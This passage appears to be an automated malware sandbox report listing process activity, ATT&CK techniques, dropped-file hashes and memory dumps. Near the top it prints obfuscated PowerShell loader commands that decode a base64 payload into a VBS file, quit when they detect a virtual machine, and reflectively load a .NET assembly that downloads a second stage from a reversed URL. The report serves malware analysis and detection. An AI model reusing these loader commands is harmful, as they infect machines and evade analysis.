⚓♲℅⚓♲KQ℅⚓♲g℅⚓♲Ck℅⚓♲';$blPuG = $DlEAp.replace('℅⚓♲','A') ;$xxjOR = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $blPuG ) ).replace('%zKAAY%','').replace('%iUYRa%','C:\Users\Public\document.vbs');powershell $xxjOR
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2428

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$wizUn = Get-CimInstance win32_computersystem;$XsQPU = $wizUn.Manufacturer;if ($XsQPU.Contains('VMware') -or $XsQPU.Contains('VirtualBox') -or $XsQPU.Contains('Hyper-V')) {;exit;};$OQwhd = 'C:\Users\Public\document.vbs';$etawF = '';[Byte[]] $LbYkV = [System.Convert]::FromBase64String( $etawF.Replace('↓:↓', 'A') );[System.AppDomain]::CurrentDomain.Load( $LbYkV ).GetType('ClassLibrary3.Class1').GetMethod('prFVI').Invoke($null, [object[]] ('reweiv=ecruos_mtu?txt.3202.21.40/daolnwod/O9891ueg/moc.thgiz.erahs//:sptth' , $OQwhd , 'True' ) )"
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2184

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

2

T1082

Query Registry

1

T1012

Remote System Discovery

1

T1018

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
Filesize
65KB

MD5
ac05d27423a85adc1622c714f2cb6184

SHA1
b0fe2b1abddb97837ea0195be70ab2ff14d43198

SHA256
c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

SHA512
6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\65O2QKLL3HEO7DHC41AL.temp
Filesize
7KB

MD5
1adf271e15e640efbc78b7993ffd9c50

SHA1
1814376ec252046af7427ec52f0dd1b7797c4eef

SHA256
8a133d4418c2a8f71a63154822552e6f3c67e60a8a70e8c583b81a627e31712c

SHA512
8bae66c21ed7be39594c0be6e18b692e925950a05648c394c1a08a543d4a151be0f9e7e287658fce1fe4029e571514283babb9ba43b8f9dd985dfd83de03f872

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize
7KB

MD5
1adf271e15e640efbc78b7993ffd9c50

SHA1
1814376ec252046af7427ec52f0dd1b7797c4eef

SHA256
8a133d4418c2a8f71a63154822552e6f3c67e60a8a70e8c583b81a627e31712c

SHA512
8bae66c21ed7be39594c0be6e18b692e925950a05648c394c1a08a543d4a151be0f9e7e287658fce1fe4029e571514283babb9ba43b8f9dd985dfd83de03f872

Download Submit
C:\Users\Public\document.vbs
Filesize
12KB

MD5
e16be05f89d8afcd22e639d3d93558dc

SHA1
3de133363cbf1d8d08572d619b54205850baf4da

SHA256
43765d1f46502f3ee9ebcb84900963ba0d3f42404dcc437f45bda1264d2badc6

SHA512
b98a247a304484685ba3dd466b6242677107729dc4e98dd7026f72f483ecd3b5d30ea2a7f7e407a52588fd3ba5b953bb8bc9776f95dc905dc7b3d662d9548fca

Download Submit
C:\Users\Public\document.vbs
Filesize
12KB

MD5
e16be05f89d8afcd22e639d3d93558dc

SHA1
3de133363cbf1d8d08572d619b54205850baf4da

SHA256
43765d1f46502f3ee9ebcb84900963ba0d3f42404dcc437f45bda1264d2badc6

SHA512
b98a247a304484685ba3dd466b6242677107729dc4e98dd7026f72f483ecd3b5d30ea2a7f7e407a52588fd3ba5b953bb8bc9776f95dc905dc7b3d662d9548fca

Download Submit
memory/840-74-0x0000000006A10000-0x0000000006B10000-memory.dmp

Filesize
1024KB

Download
memory/840-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/840-78-0x000000007212D000-0x0000000072138000-memory.dmp

Filesize
44KB

Download
memory/840-77-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/840-5-0x0000000006A10000-0x0000000006B10000-memory.dmp

Filesize
1024KB

Download
memory/840-6-0x0000000006A10000-0x0000000006B10000-memory.dmp

Filesize
1024KB

Download
memory/840-1-0x000000007212D000-0x0000000072138000-memory.dmp

Filesize
44KB

Download
memory/840-73-0x000000007212D000-0x0000000072138000-memory.dmp

Filesize
44KB

Download
memory/2184-75-0x000000006B620000-0x000000006BBCB000-memory.dmp

Filesize
5.7MB

Download
memory/2184-71-0x000000006B620000-0x000000006BBCB000-memory.dmp

Filesize
5.7MB

Download
memory/2184-72-0x000000006B620000-0x000000006BBCB000-memory.dmp

Filesize
5.7MB

Download
memory/2428-65-0x000000006B620000-0x000000006BBCB000-memory.dmp

Filesize
5.7MB

Download
memory/2428-76-0x000000006B620000-0x000000006BBCB000-memory.dmp

Filesize
5.7MB

Download
memory/2428-63-0x000000006B620000-0x000000006BBCB000-memory.dmp

Filesize
5.7MB

Download
memory/2428-64-0x0000000002C70000-0x0000000002CB0000-memory.dmp

Filesize
256KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads